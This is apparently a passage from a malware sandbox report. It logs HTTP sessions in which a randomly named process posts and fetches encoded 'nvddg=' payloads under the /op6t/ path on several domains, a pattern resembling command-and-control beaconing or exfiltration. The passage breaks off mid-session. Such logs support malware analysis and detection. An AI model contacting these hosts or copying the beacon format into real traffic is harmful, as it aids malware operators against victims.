                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        40 | 192.168.11.30 | 49836 | 34.149.87.45 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:07.418550968 CEST | 1723 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.century21morenoycia.mx
                                                                        Origin: http://www.century21morenoycia.mx
                                                                        Referer: http://www.century21morenoycia.mx/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:35:07.639972925 CEST | 1077 | IN | HTTP/1.1 403 Forbidden
                                                                        Content-Length: 548
                                                                        Content-Type: text/html
                                                                        Server: Pepyaka
                                                                        X-Wix-Request-Id: 1716392107.534903909656384024
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Date: Wed, 22 May 2024 15:35:07 GMT
                                                                        X-Served-By: cache-bfi-krnt7300097-BFI
                                                                        X-Cache: MISS
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLuuWLGLAwvTMYA8ArAuxUdgm++C2XkuTvnlRFg2XiSDL
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        41 | 192.168.11.30 | 49837 | 34.149.87.45 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:10.120994091 CEST | 495 | OUT | GET /op6t/?nvddg=1X53ctdebY/A2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY=&x2=wN2xY HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.century21morenoycia.mx
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:35:10.409082890 CEST | 1032 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Content-Length: 0
                                                                        Location: https://www.century21morenoycia.mx/op6t?nvddg=1X53ctdebY%2FA2eDtJqzL446hhD1I+nvyO5ulDREEvqgJJ1wskdyJ8sishyyYv1KZ95Yv7APwNDtcqTXRSGEguqmEKyboxWEzcfGHGWjx7gGV1XFCOYCNEPY%3D&x2=wN2xY
                                                                        Strict-Transport-Security: max-age=86400
                                                                        X-Wix-Request-Id: 1716392110.2582149888080321981
                                                                        Cache-Control: public,max-age=0,must-revalidate
                                                                        Server: Pepyaka
                                                                        X-Content-Type-Options: nosniff
                                                                        Accept-Ranges: bytes
                                                                        Age: 188
                                                                        Date: Wed, 22 May 2024 15:35:10 GMT
                                                                        X-Served-By: cache-bfi-krnt7300031-BFI
                                                                        X-Cache: MISS
                                                                        Server-Timing: cache;desc=hit, varnish;desc=hit_miss, dc;desc=fastly_42_g
                                                                        X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLlAwLb1tXR23DYhcoMEdpYDu/2EjeiyKjB/JVOb8T5Ve,2d58ifebGbosy5xc+FRalrhpWypQjkN0c9Yyjq8PhwED/fYRQ4IOHT7hzVeDA+M0Am013clB2g4ltmDwjNX+2Q==,2UNV7KOq4oGjA5+PKsX47Dble4mX84gMvMh/QnMYdHsfbJaKSXYQ/lskq2jK6SGP
                                                                        Via: 1.1 google
                                                                        glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                        Connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        42 | 192.168.11.30 | 49838 | 34.174.122.2 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:32.118311882 CEST | 780 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=MFggT74RcgGFBbtP9PuBuHtLOyMc2wCWiNeNWqLRoYzcnasRXpEkuZimehnS/rL78GjprdG02nDUl6c7QecaqJqQo64YTyQIUUxTZAGBpmVBqa2sMP6Yjj7vnzuWqiFIap1NihbzvYtc4w+C1F+4jUk7UDUdwQPD9a5aJv1qsPKtGef4ajJG9c21qUEfy+xc0A==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        43 | 192.168.11.30 | 49839 | 34.174.122.2 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:34.866075993 CEST | 800 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=MFggT74RcgGFB6dPyMGBontMASMctAD+iNiNWrOOpujcm7cRFcoktZimMBnLibLG8Gvbrc602nXUl7s7TpwFrZqWiq4acSQIUUxTZAinpmdBtqGsNtSb9T7skzuWhCFUap0Yig3Zvdxc4wuC1U+7w0k9KzVr1i6T1eZYH4ZGkOTVKpuiHg9Eu8KY2Vp3w8wHpEAmMpjaFNHMPZTYKhsm5Jo=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        44 | 192.168.11.30 | 49840 | 34.174.122.2 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:37.612730980 CEST | 1717 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.facesofhoustontx.com
                                                                        Origin: http://www.facesofhoustontx.com
                                                                        Referer: http://www.facesofhoustontx.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=MFggT74RcgGFB6dPyMGBontMASMctAD+iNiNWrOOpurcmNIRXLcksZimPBnWibLX8Fffrc2k2kvUmZk7SYwFkZqWqK4ZTyQdUVBXZAynpmdBtsqsEf6b/T7vnzuKqiFoathvigDjsp9c4ReCzmW7zUk/LzVj1inJ1a4pH4FskMzVb+PVcB9F5eO6z08A3PkLhDZbMKD7Guv6K+v6QCERktf+64Uxo4Xom1jTd4EmaiTaNGDaYfscg8L0QzioX8R7TgQk0VJm5UNPUbqruyuNA1cdYpzfLCdrQ8S3ijF0V1qmaTSpuKnLDHEUHA4G1qVDgZU8t/98NFMrOqK7nA3yflSHNl6/vLIteJPPkc9im1aBJH80mtyzRICtxK7Dt/u1w8+2TtKvZ6+WPOw6HWmfVXEZZc9o1PI8WXr0NBMqANv5woCjlC/UUd0dUe3+D6hmHiVJct+5ryk4QW4kuwimSj2FPbphcSeuCw91SDEO9q/VIXexP9zB+PylFhsK4mfWAOEwpXEIbJ3A0yQvnOy8N/jMnN08ziILLaRliCVvJBPLLtOzwyMUpValMiUvtIeQMudhrr+hxCkF7gNK/TwfMYRcLz8aSKoWgJVfLTPdXpfp0LL1IbKhAUH93vIG4EKOGah1Ud2sYxfNonJAdm039GZUEZ4XLgIiyPXH2eealC6aXERvJgx1Oxatih89ovf148KxGZvkuIjUPZRtj031fCNzm6A0MftnymtZdc+gGVOlW8ElpyzLfFLIhYqaS8ugDFNOrEbI+mtLZOi/rTls0CcseDXamQfLHrDW1gqwWdLJcupkR1eRm6zbD2K6afphE6u8mw43RGeRtVr8QPmaXowq7mOp5Kysr3i9GPjaGDr5JqjU2rRvPxlX8eVF1XSmlUtEoLakjFCvm0CMmTR2ufaIOkMjlN3my1MbfQtTQj0aZtud4mDyPHXZ7a/EoW87X/yWK+IXuzxomxBDsRGuzJTqtTjF6gUNRj0hJsE7tso8eb [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        45 | 192.168.11.30 | 49841 | 34.174.122.2 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:40.369095087 CEST | 493 | OUT | GET /op6t/?x2=wN2xY&nvddg=BHIAQNMULh6XRL1bx9H5u1ZiIAZR91nuzdCSdKuFpLeK/J0eLacPvObCKir816qtvGKK6uKZvELi45NaX+Eep6GNrYofejB/V2VvbUmxnRNQoZSvM+S992o= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.facesofhoustontx.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        46 | 192.168.11.30 | 49842 | 47.243.134.243 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:54.305818081 CEST | 753 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=M3POp1NEKYhG3xU7fMvZmBpg08FQ6g+NYmhb/t7Py9rYJ/HhEjyp+B5gogzfgkZXG2by6hrTVe/UbiHSobOldenfimcGg9o4gjRFrYYjKvgtXFSdbGb7x57dZuDmPYdsr5nL2yHCOXRt2DgnNNzdWd6oAERql5K0H0YC1Diejyto+q1oR9l7mIoC2qf4+YdQMw==
                                                                        May 22, 2024 17:35:54.798067093 CEST | 354 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:35:54 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        47 | 192.168.11.30 | 49843 | 47.243.134.243 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:35:57.219108105 CEST | 773 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=M3POp1NEKYhG3Sc7dtvZhhpj7cFQ1A+JYmdb/oCUxPPYJbPhKCyp/B5gjAyVkkZcG2HQ6j/TVerUbnDSoMamfOnd2WcEudo4gjRFrYNOKuItX1OdJk/87Z7ceuDmLYdor5nl2zalOVpt2BonOZneYd6qEEQpmrjNP14f0zy4sApD2dEyM+R51oUvqryQ8acLR8SDWy7ghP+vBL3lljJ2Bvo=
                                                                        May 22, 2024 17:35:57.606918097 CEST | 354 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:35:57 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        48 | 192.168.11.30 | 49844 | 47.243.134.243 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:36:00.218278885 CEST | 1690 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.cngdesk.com
                                                                        Origin: http://www.cngdesk.com
                                                                        Referer: http://www.cngdesk.com/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:36:00.686383009 CEST | 354 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:00 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        49 | 192.168.11.30 | 49845 | 47.243.134.243 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        May 22, 2024 17:36:03.208013058 CEST | 484 | OUT | GET /op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4= HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Host: www.cngdesk.com
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        May 22, 2024 17:36:03.637356043 CEST | 490 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Wed, 22 May 2024 15:36:03 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.cngdesk.com/op6t/?x2=wN2xY&nvddg=B1nuqD59UoVahAAaaPrLlCdA9edg7gWIZ1BY+KXGwtiEVaDOMCSD80sEnTK1l1I1d32+6CzQNcHoayq10cGYYZnPmWF+i7E8hCdylepAFYAEUUK5dUTY9b4=
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.11.30 | 49846 | 203.161.49.193 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
Timestamp | Bytes transferred | Direction | Data
May 22, 2024 17:36:08.860966921 CEST | 756 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 202
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWNo8JlaaNBZd/BU9ZkuVVCFq8i8M7IKfLYTDnjShYy2ws03ydvswFJhDXEhAU+R5bK+Y6cqqFoNB+imzuee3+LDhK3RZZ//AsxjC1sKkfvUq68t9yn5HPQyOqBE3Mvllq9rL0U+IlF4G5W9og5nc9R2YcFcaxA8p4zZow/2s66/E6HvreqmjEcA==
May 22, 2024 17:36:09.079746008 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:36:08 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.11.30 | 49847 | 203.161.49.193 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
Timestamp | Bytes transferred | Direction | Data
May 22, 2024 17:36:11.593194008 CEST | 776 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 222
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWMJsJg9ONIZd4dk9ZqOVRCFm8i9JmI57LY2/niThYhGwsgnyc3Mw0JhH1Eh8U+RFbK786cZCGodB8qGzoQ+3+LDhK3Vxz//YsxTy1suIAl0qlq99yj5HLQyOIBHypvghq9q70UMwmO4H8Zdpz3XZqJE5xU+PuBMoDyOZqi1Y4pf4XbuG2okifBA9Qc7DwxxTJrwYI/WjoRkw=
May 22, 2024 17:36:11.819117069 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:36:11 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.11.30 | 49848 | 203.161.49.193 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
Timestamp | Bytes transferred | Direction | Data
May 22, 2024 17:36:14.327382088 CEST | 1693 | OUT | POST /op6t/ HTTP/1.1
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-US,en
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Host: www.shortfox.top
                                                                        Origin: http://www.shortfox.top
                                                                        Referer: http://www.shortfox.top/op6t/
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 1138
                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                        Data Ascii: nvddg=5PaU+xq3MhyWMJsJg9ONIZd4dk9ZqOVRCFm8i9JmI5zLZEHnkwJYiGws8XyR3MwtJlTxEhwu+UBbKZ06NYCGxtB812zpee3vLDxO3RVz//YsxV+1lakAj0q68t9mn5HzQyWyBEeTuUVq+Kr0WZkmMYHyN9o03WktJEkdU/qBBMQD2ZwC/WUwzcwEUbvMnCONJgVgWLTJniDFwHgokHrxSB5FJ7WaTshl7so1VZa8/deEA9pnxocQ+/o7j5wxuAQbBScJ2WtBPlH3rCLbSINqq8WQzrnp25DmRGkzxmuvSibz+LPOZan9KRxs5w+7xyZIoM6sFs0Z44jPx1lLTcLLrJCByrEVjmQyxKdpPq/PzMCzg9r7COTjnB0RhLse8hUIeftYIrsaFnQHstuIlf3jCLq7NEBxz6o3u9Ix8H0CBnBONfDilU/Y018o25BEphT7ypGXXbOeryO5e/YPyRmKFrxN5BbIIzoLosFqUTWCqsrI1BucYKqZJk7UY5vMslXDALXTQK+HmfckVSFFSoulZonsi5pgA3TEgSelt7rTf1+NuQfcK62LK1OXLWsJkErSMo+TZhA614jnAs2A2ZOJPFMWlh2TIJ5dsakODt7rWViFhifL69A2FZhsqG6+TSxNWxoyW6ow4zCcSfddYYqDXVXQrL9i7KfmPG+AxYtz56AHgo0l56dnyjGuLwDxKOe6iLdaQDj8zm7xPbyWQbn/2C360FnAh2zyQRCM81sqXUTF5sWOuBE1LeTxZ5ONf0zNEhQgB9tlyYiJiIHMxzactbjwzrP5xNqC+2zOIAj7pptAkflXZCM76/YQloS0mpuyaPNQwNpey6oQAorNqIkvYO2W281xaNyuDQr9WU6hjBTQRhsc14pc1/f1hf9F2W70Ro8AJC02wOJ5rt+IGelyp7zOCn2BXi4Mgpj4VQoFN8pjlaEZMcgohmbQb0tdQKiVGzdFYedxU9NSfTDR9B9Iak2mD0god+6/rhqIH5jCLeTHW9 [TRUNCATED]
May 22, 2024 17:36:14.550146103 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Wed, 22 May 2024 15:36:14 GMT
                                                                        Server: Apache
                                                                        Content-Length: 389
                                                                        Connection: close
                                                                        Content-Type: text/html
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.11.30 | 49849 | 203.161.49.193 | 80 | 7248 | C:\Program Files (x86)\HusdUokqcMINxYBlXpWPlQQkwhJtANoBYKBkdDMUffYMwoyZFdOVzihPMzjfShFeueCXMN\aqqPMpTRvveOzLCNSEwwpwdiQeo.exe
Timestamp | Bytes transferred | Direction | Data
